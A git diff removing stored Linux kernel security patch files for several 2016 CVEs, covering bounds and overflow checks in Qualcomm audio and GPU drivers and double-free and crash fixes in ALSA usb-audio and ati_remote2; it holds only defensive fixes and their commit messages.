- 			if (length != 1 || index_offset != 0) {
-@@ -781,17 +1045,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = eq->enable_flag;
--			eq->enable_flag = *values++;
-+			eq->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: EQ_ENABLE prev:%d new:%d\n", __func__,
- 				prev_enable_flag, eq->enable_flag);
- 			if (prev_enable_flag != eq->enable_flag) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_ENABLE", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
--				*updt_params++ = AUDPROC_PARAM_ID_EQ_ENABLE;
--				*updt_params++ = EQ_ENABLE_PARAM_SZ;
--				*updt_params++ = eq->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_EQ_ENABLE;
-+				*updt_params++ =
- 					EQ_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					eq->enable_flag;
- 			}
- 			break;
- 		case EQ_CONFIG:
-@@ -805,9 +1078,12 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				eq->config.eq_pregain, eq->config.preset_id);
- 			for (idx = 0; idx < MAX_EQ_BANDS; idx++)
- 				eq->per_band_cfg[idx].band_idx = -1;
--			eq->config.eq_pregain = *values++;
--			eq->config.preset_id = *values++;
--			eq->config.num_bands = *values++;
-+			eq->config.eq_pregain =
-+				GET_NEXT(values, param_max_offset, rc);
-+			eq->config.preset_id =
-+				GET_NEXT(values, param_max_offset, rc);
-+			eq->config.num_bands =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (eq->config.num_bands > MAX_EQ_BANDS) {
- 				pr_err("EQ_CONFIG:invalid num of bands\n");
- 				rc = -EINVAL;
-@@ -822,48 +1098,59 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			for (j = 0; j < eq->config.num_bands; j++) {
--				idx = *values++;
-+				idx = GET_NEXT(values, param_max_offset, rc);
- 				if (idx >= MAX_EQ_BANDS) {
- 					pr_err("EQ_CONFIG:invalid band index\n");
- 					rc = -EINVAL;
- 					goto invalid_config;
- 				}
- 				eq->per_band_cfg[idx].band_idx = idx;
--				eq->per_band_cfg[idx].filter_type = *values++;
-+				eq->per_band_cfg[idx].filter_type =
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].freq_millihertz =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].gain_millibels =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].quality_factor =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 			}
- 			if (command_config_state == CONFIG_SET) {
- 				int config_param_length = EQ_CONFIG_PARAM_SZ +
- 					(EQ_CONFIG_PER_BAND_PARAM_SZ*
- 					 eq->config.num_bands);
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						config_param_length;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_CONFIG", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
--				*updt_params++ = AUDPROC_PARAM_ID_EQ_CONFIG;
--				*updt_params++ = config_param_length;
--				*updt_params++ = eq->config.eq_pregain;
--				*updt_params++ = eq->config.preset_id;
--				*updt_params++ = eq->config.num_bands;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_EQ_CONFIG;
-+				*updt_params++ =
-+					config_param_length;
-+				*updt_params++ =
-+					eq->config.eq_pregain;
-+				*updt_params++ =
-+					eq->config.preset_id;
-+				*updt_params++ =
-+					eq->config.num_bands;
- 				for (idx = 0; idx < MAX_EQ_BANDS; idx++) {
- 					if (eq->per_band_cfg[idx].band_idx < 0)
- 						continue;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].filter_type;
-+					eq->per_band_cfg[idx].filter_type;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].freq_millihertz;
-+					eq->per_band_cfg[idx].freq_millihertz;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].gain_millibels;
-+					eq->per_band_cfg[idx].gain_millibels;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].quality_factor;
-+					eq->per_band_cfg[idx].quality_factor;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].band_idx;
-+					eq->per_band_cfg[idx].band_idx;
- 				}
--				params_length += COMMAND_PAYLOAD_SZ +
--						config_param_length;
- 			}
- 			break;
- 		case EQ_BAND_INDEX:
-@@ -872,7 +1159,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			idx = *values++;
-+			idx = GET_NEXT(values, param_max_offset, rc);
- 			if (idx > MAX_EQ_BANDS) {
- 				pr_err("EQ_BAND_INDEX:invalid band index\n");
- 				rc = -EINVAL;
-@@ -882,14 +1169,21 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 			pr_debug("%s: EQ_BAND_INDEX val:%d\n",
- 				__func__, eq->band_index);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_BAND_INDEX_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_BAND_INDEX", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_EQ_BAND_INDEX;
--				*updt_params++ = EQ_BAND_INDEX_PARAM_SZ;
--				*updt_params++ = eq->band_index;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					EQ_BAND_INDEX_PARAM_SZ;
-+				*updt_params++ =
-+					eq->band_index;
- 			}
- 			break;
- 		case EQ_SINGLE_BAND_FREQ:
-@@ -902,18 +1196,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				pr_err("EQ_SINGLE_BAND_FREQ:invalid index\n");
- 				break;
- 			}
--			eq->freq_millihertz = *values++;
-+			eq->freq_millihertz =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: EQ_SINGLE_BAND_FREQ idx:%d, val:%d\n",
- 				__func__, eq->band_index, eq->freq_millihertz);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_SINGLE_BAND_FREQ_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_SINGLE_BAND_FREQ", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_EQ_SINGLE_BAND_FREQ;
--				*updt_params++ = EQ_SINGLE_BAND_FREQ_PARAM_SZ;
--				*updt_params++ = eq->freq_millihertz;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					EQ_SINGLE_BAND_FREQ_PARAM_SZ;
-+				*updt_params++ =
-+					eq->freq_millihertz;
- 			}
- 			break;
- 		default:
-@@ -921,7 +1223,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -938,9 +1240,10 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- {
- 	int devices;
- 	int num_commands;
--	char *params;
-+	char *params = NULL;
- 	int *updt_params, i;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-+	long *param_max_offset;
- 	int rc = 0;
- 
- 	pr_debug("%s: instance: %d\n", __func__, instance);
-@@ -949,9 +1252,11 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 			__func__);
- 		return -EINVAL;
- 	}
--	if (!ac) {
--		pr_err("%s: cannot set audio effects as audio client is NULL\n",
--			__func__);
-+	param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	devices = GET_NEXT(values, param_max_offset, rc);
-+	num_commands = GET_NEXT(values, param_max_offset, rc);
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
-+		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
- 	params = kzalloc(params_length, GFP_KERNEL);
-@@ -959,88 +1264,114 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 		pr_err("%s, params memory alloc failed\n", __func__);
- 		return -ENOMEM;
- 	}
--	devices = *values++;
--	num_commands = *values++;
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case SOFT_VOLUME_GAIN_2CH:
- 		case SOFT_VOLUME2_GAIN_2CH:
- 			if (length != 2 || index_offset != 0) {
--				pr_err("VOLUME_GAIN_2CH/VOLUME2_GAIN_2CH:invalid params\n");
-+				pr_err("VOLUME_GAIN_2CH: invalid params\n");
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			vol->left_gain = *values++;
--			vol->right_gain = *values++;
-+			vol->left_gain = GET_NEXT(values, param_max_offset, rc);
-+			vol->right_gain =
-+				GET_NEXT(values, param_max_offset, rc);
- 			vol->master_gain = 0x2000;
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VOLUME/VOLUME2_GAIN_2CH",
-+						rc);
-+				if (rc != 0)
-+					break;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN;
--				*updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
--				*updt_params++ = (vol->left_gain << 16) |
--						 vol->right_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					(vol->left_gain << 16) |
-+						vol->right_gain;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN;
- 				*updt_params++ =
- 					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
--				*updt_params++ = vol->master_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				*updt_params++ =
-+					vol->master_gain;
- 			}
- 			break;
- 		case SOFT_VOLUME_GAIN_MASTER:
- 		case SOFT_VOLUME2_GAIN_MASTER:
- 			if (length != 1 || index_offset != 0) {
--				pr_err("VOLUME_GAIN_MASTER/VOLUME2_GAIN_MASTER:invalid params\n");
-+				pr_err("VOLUME_GAIN_MASTER: invalid params\n");
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
- 			vol->left_gain = 0x2000;
- 			vol->right_gain = 0x2000;
--			vol->master_gain = *values++;
-+			vol->master_gain =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VOLUME/VOLUME2_GAIN_MASTER",
-+						rc);
-+				if (rc != 0)
-+					break;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN;
--				*updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
--				*updt_params++ = (vol->left_gain << 16) |
--						 vol->right_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					(vol->left_gain << 16) |
-+						vol->right_gain;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN;
- 				*updt_params++ =
- 					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
--				*updt_params++ = vol->master_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				*updt_params++ =
-+					vol->master_gain;
- 			}
- 			break;
- 		default:
-@@ -1049,7 +1380,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length)
-+	if (params_length && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- invalid_config:
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index f814434..b4bd43d 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -2839,7 +2839,7 @@ static int msm_compr_audio_effects_config_info(struct snd_kcontrol *kcontrol,
- 					       struct snd_ctl_elem_info *uinfo)
- {
- 	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
--	uinfo->count = 128;
-+	uinfo->count = MAX_PP_PARAMS_SZ;
- 	uinfo->value.integer.min = 0;
- 	uinfo->value.integer.max = 0xFFFFFFFF;
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2067/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2067/ANY/0001.patch
deleted file mode 100644
index 1266bd30..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2067/ANY/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 410cfa95f0a1cf58819cbfbd896f9aa45b004ac0 Mon Sep 17 00:00:00 2001
-From: Tarun Karra <tkarra@codeaurora.org>
-Date: Thu, 17 Mar 2016 21:10:36 -0700
-Subject: msm: kgsl: verify user memory permissions before mapping to GPU
- driver
-
-For user memory of type KGSL_USER_MEM_TYPE_ADDR mapped to GPU driver
-verify permissions and map GPU permissions same as CPU permissions.
-If elevated permissions are requested return an error to prevent
-privilege escalation. Without this check user could map readonly
-memory into GPU driver as readwrite and gain elevated privilege.
-
-Write permissions check is currently inverted causing readonly
-user pages to be mapped as readwrite in GPU driver. Fix this
-check to map readonly pages as readonly.
-
-CRs-Fixed: 988993
-Change-Id: I0e097d7e4e4c414c0849e33bcc61a26fb94291ad
-Signed-off-by: Tarun Karra <tkarra@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 24 ++++++++++++++++++++++--
- 1 file changed, 22 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index d5e96ab..cecc463 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1961,6 +1961,20 @@ static inline int _check_region(unsigned long start, unsigned long size,
- 	return (end > len);
- }
- 
-+static int check_vma_flags(struct vm_area_struct *vma,
-+		unsigned int flags)
-+{
-+	unsigned long flags_requested = (VM_READ | VM_WRITE);
-+
-+	if (flags & KGSL_MEMFLAGS_GPUREADONLY)
-+		flags_requested &= ~VM_WRITE;
-+
-+	if ((vma->vm_flags & flags_requested) == flags_requested)
-+		return 0;
-+
-+	return -EFAULT;
-+}
-+
- static int check_vma(struct vm_area_struct *vma, struct file *vmfile,
- 		struct kgsl_memdesc *memdesc)
- {
-@@ -1974,7 +1988,7 @@ static int check_vma(struct vm_area_struct *vma, struct file *vmfile,
- 	if (vma->vm_start != memdesc->useraddr ||
- 		(memdesc->useraddr + memdesc->size) != vma->vm_end)
- 		return -EINVAL;
--	return 0;
-+	return check_vma_flags(vma, memdesc->flags);
- }
- 
- static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
-@@ -1983,7 +1997,7 @@ static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
- 	long npages = 0, i;
- 	size_t sglen = (size_t) (memdesc->size / PAGE_SIZE);
- 	struct page **pages = NULL;
--	int write = (memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY) != 0;
-+	int write = ((memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY) ? 0 : 1);
- 
- 	if (sglen == 0 || sglen >= LONG_MAX)
- 		return -EINVAL;
-@@ -2102,6 +2116,12 @@ static int kgsl_setup_dmabuf_useraddr(struct kgsl_device *device,
- 	if (vma && vma->vm_file) {
- 		int fd;
- 
-+		ret = check_vma_flags(vma, entry->memdesc.flags);
-+		if (ret) {
-+			up_read(&current->mm->mmap_sem);
-+			return ret;
-+		}
-+
- 		/*
- 		 * Check to see that this isn't our own memory that we have
- 		 * already mapped
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2068/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2068/ANY/0001.patch
deleted file mode 100644
index 69a66f37..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2068/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 01ee86da5a0cd788f134e360e2be517ef52b6b00 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang <wjiang@codeaurora.org>
-Date: Tue, 26 Apr 2016 14:35:38 +0800
-Subject: ASoC: msm: audio-effects: misc fixes in h/w accelerated effect
-
-Adding memory copy size check and integer overflow check in h/w
-accelerated effect driver.
-
-Change-Id: I17d4cc0a38770f0c5067fa8047cd63e7bf085e48
-CRs-Fixed: 1006609
-Signed-off-by: Weiyin Jiang <wjiang@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 8 +++++---
- sound/soc/msm/qdsp6v2/q6asm.c                   | 8 +++++++-
- 2 files changed, 12 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index c100c47..525d72a 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -164,7 +164,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 
- 		pr_debug("%s: dec buf size: %d, num_buf: %d, enc buf size: %d, num_buf: %d\n",
- 			 __func__, effects->config.output.buf_size,
--			 effects->config.output.buf_size,
-+			 effects->config.output.num_buf,
- 			 effects->config.input.buf_size,
- 			 effects->config.input.num_buf);
- 		rc = q6asm_audio_client_buf_alloc_contiguous(IN, effects->ac,
-@@ -252,7 +252,8 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 
- 		bufptr = q6asm_is_cpu_buf_avail(IN, effects->ac, &size, &idx);
- 		if (bufptr) {
--			if (copy_from_user(bufptr, (void *)arg,
-+			if ((effects->config.buf_cfg.output_len > size) ||
-+				copy_from_user(bufptr, (void *)arg,
- 					effects->config.buf_cfg.output_len)) {
- 				rc = -EFAULT;
- 				goto ioctl_fail;
-@@ -308,7 +309,8 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 				rc = -EFAULT;
- 				goto ioctl_fail;
- 			}
--			if (copy_to_user((void *)arg, bufptr,
-+			if ((effects->config.buf_cfg.input_len > size) ||
-+				copy_to_user((void *)arg, bufptr,
- 					  effects->config.buf_cfg.input_len)) {
- 				rc = -EFAULT;
- 				goto ioctl_fail;
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 0991d30..1c6e938 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  * Author: Brian Swetland <swetland@google.com>
-  *
-  * This software is licensed under the terms of the GNU General Public
-@@ -1212,6 +1212,12 @@ int q6asm_audio_client_buf_alloc_contiguous(unsigned int dir,
- 
- 	ac->port[dir].buf = buf;
- 
-+	/* check for integer overflow */
-+	if ((bufcnt > 0) && ((INT_MAX / bufcnt) < bufsz)) {
-+		pr_err("%s: integer overflow\n", __func__);
-+		mutex_unlock(&ac->cmd_lock);
-+		goto fail;
-+	}
- 	bytes_to_alloc = bufsz * bufcnt;
- 
- 	/* The size to allocate should be multiple of 4K bytes */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2184/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2184/ANY/0001.patch
deleted file mode 100644
index e0050c6a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2184/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 836b34a935abc91e13e63053d0a83b24dfb5ea78 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov <vdronov@redhat.com>
-Date: Thu, 31 Mar 2016 12:05:43 -0400
-Subject: ALSA: usb-audio: Fix double-free in error paths after
- snd_usb_add_audio_stream() call
-
-create_fixed_stream_quirk(), snd_usb_parse_audio_interface() and
-create_uaxx_quirk() functions allocate the audioformat object by themselves
-and free it upon error before returning. However, once the object is linked
-to a stream, it's freed again in snd_usb_audio_pcm_free(), thus it'll be
-double-freed, eventually resulting in a memory corruption.
-
-This patch fixes these failures in the error paths by unlinking the audioformat
-object before freeing it.
-
-Based on a patch by Takashi Iwai <tiwai@suse.de>
-
-[Note for stable backports:
- this patch requires the commit 902eb7fd1e4a ('ALSA: usb-audio: Minor
- code cleanup in create_fixed_stream_quirk()')]
-
-Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1283358
-Reported-by: Ralf Spenneberg <ralf@spenneberg.net>
-Cc: <stable@vger.kernel.org> # see the note above
-Signed-off-by: Vladis Dronov <vdronov@redhat.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/quirks.c | 4 ++++
- sound/usb/stream.c | 6 +++++-
- 2 files changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
-index fb62bce..6178bb5 100644
---- a/sound/usb/quirks.c
-+++ b/sound/usb/quirks.c
-@@ -150,6 +150,7 @@ static int create_fixed_stream_quirk(struct snd_usb_audio *chip,
- 		usb_audio_err(chip, "cannot memdup\n");
- 		return -ENOMEM;
- 	}
-+	INIT_LIST_HEAD(&fp->list);
- 	if (fp->nr_rates > MAX_NR_RATES) {
- 		kfree(fp);
- 		return -EINVAL;
-@@ -193,6 +194,7 @@ static int create_fixed_stream_quirk(struct snd_usb_audio *chip,
- 	return 0;
- 
-  error:
-+	list_del(&fp->list); /* unlink for avoiding double-free */
- 	kfree(fp);
- 	kfree(rate_table);
- 	return err;
-@@ -469,6 +471,7 @@ static int create_uaxx_quirk(struct snd_usb_audio *chip,
- 	fp->ep_attr = get_endpoint(alts, 0)->bmAttributes;
- 	fp->datainterval = 0;
- 	fp->maxpacksize = le16_to_cpu(get_endpoint(alts, 0)->wMaxPacketSize);
-+	INIT_LIST_HEAD(&fp->list);
- 
- 	switch (fp->maxpacksize) {
- 	case 0x120:
-@@ -492,6 +495,7 @@ static int create_uaxx_quirk(struct snd_usb_audio *chip,
- 		? SNDRV_PCM_STREAM_CAPTURE : SNDRV_PCM_STREAM_PLAYBACK;
- 	err = snd_usb_add_audio_stream(chip, stream, fp);
- 	if (err < 0) {
-+		list_del(&fp->list); /* unlink for avoiding double-free */
- 		kfree(fp);
- 		return err;
- 	}
-diff --git a/sound/usb/stream.c b/sound/usb/stream.c
-index c4dc577..8e9548bc 100644
---- a/sound/usb/stream.c
-+++ b/sound/usb/stream.c
-@@ -314,7 +314,9 @@ static struct snd_pcm_chmap_elem *convert_chmap(int channels, unsigned int bits,
- /*
-  * add this endpoint to the chip instance.
-  * if a stream with the same endpoint already exists, append to it.
-- * if not, create a new pcm stream.
-+ * if not, create a new pcm stream. note, fp is added to the substream
-+ * fmt_list and will be freed on the chip instance release. do not free
-+ * fp or do remove it from the substream fmt_list to avoid double-free.
-  */
- int snd_usb_add_audio_stream(struct snd_usb_audio *chip,
- 			     int stream,
-@@ -675,6 +677,7 @@ int snd_usb_parse_audio_interface(struct snd_usb_audio *chip, int iface_no)
- 					* (fp->maxpacksize & 0x7ff);
- 		fp->attributes = parse_uac_endpoint_attributes(chip, alts, protocol, iface_no);
- 		fp->clock = clock;
-+		INIT_LIST_HEAD(&fp->list);
- 
- 		/* some quirks for attributes here */
- 
-@@ -723,6 +726,7 @@ int snd_usb_parse_audio_interface(struct snd_usb_audio *chip, int iface_no)
- 		dev_dbg(&dev->dev, "%u:%d: add audio endpoint %#x\n", iface_no, altno, fp->endpoint);
- 		err = snd_usb_add_audio_stream(chip, stream, fp);
- 		if (err < 0) {
-+			list_del(&fp->list); /* unlink for avoiding double-free */
- 			kfree(fp->rate_table);
- 			kfree(fp->chmap);
- 			kfree(fp);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2185/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2185/ANY/0001.patch
deleted file mode 100644
index 5731daee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2185/ANY/0001.patch
+++ /dev/null
@@ -1,109 +0,0 @@
-From 950336ba3e4a1ffd2ca60d29f6ef386dd2c7351d Mon Sep 17 00:00:00 2001
-From: Vladis Dronov <vdronov@redhat.com>
-Date: Wed, 23 Mar 2016 11:53:46 -0700
-Subject: Input: ati_remote2 - fix crashes on detecting device with invalid
- descriptor
-
-The ati_remote2 driver expects at least two interfaces with one
-endpoint each. If given malicious descriptor that specify one
-interface or no endpoints, it will crash in the probe function.
-Ensure there is at least two interfaces and one endpoint for each
-interface before using it.
-
-The full disclosure: http://seclists.org/bugtraq/2016/Mar/90
-
-Reported-by: Ralf Spenneberg <ralf@spenneberg.net>
-Signed-off-by: Vladis Dronov <vdronov@redhat.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/misc/ati_remote2.c | 36 ++++++++++++++++++++++++++++++------
- 1 file changed, 30 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/input/misc/ati_remote2.c b/drivers/input/misc/ati_remote2.c
-index cfd58e8..1c5914c 100644
---- a/drivers/input/misc/ati_remote2.c
-+++ b/drivers/input/misc/ati_remote2.c
-@@ -817,26 +817,49 @@ static int ati_remote2_probe(struct usb_interface *interface, const struct usb_d
- 
- 	ar2->udev = udev;
- 
-+	/* Sanity check, first interface must have an endpoint */
-+	if (alt->desc.bNumEndpoints < 1 || !alt->endpoint) {
-+		dev_err(&interface->dev,
-+			"%s(): interface 0 must have an endpoint\n", __func__);
-+		r = -ENODEV;
-+		goto fail1;
-+	}
- 	ar2->intf[0] = interface;
- 	ar2->ep[0] = &alt->endpoint[0].desc;
- 
-+	/* Sanity check, the device must have two interfaces */
- 	ar2->intf[1] = usb_ifnum_to_if(udev, 1);
-+	if ((udev->actconfig->desc.bNumInterfaces < 2) || !ar2->intf[1]) {
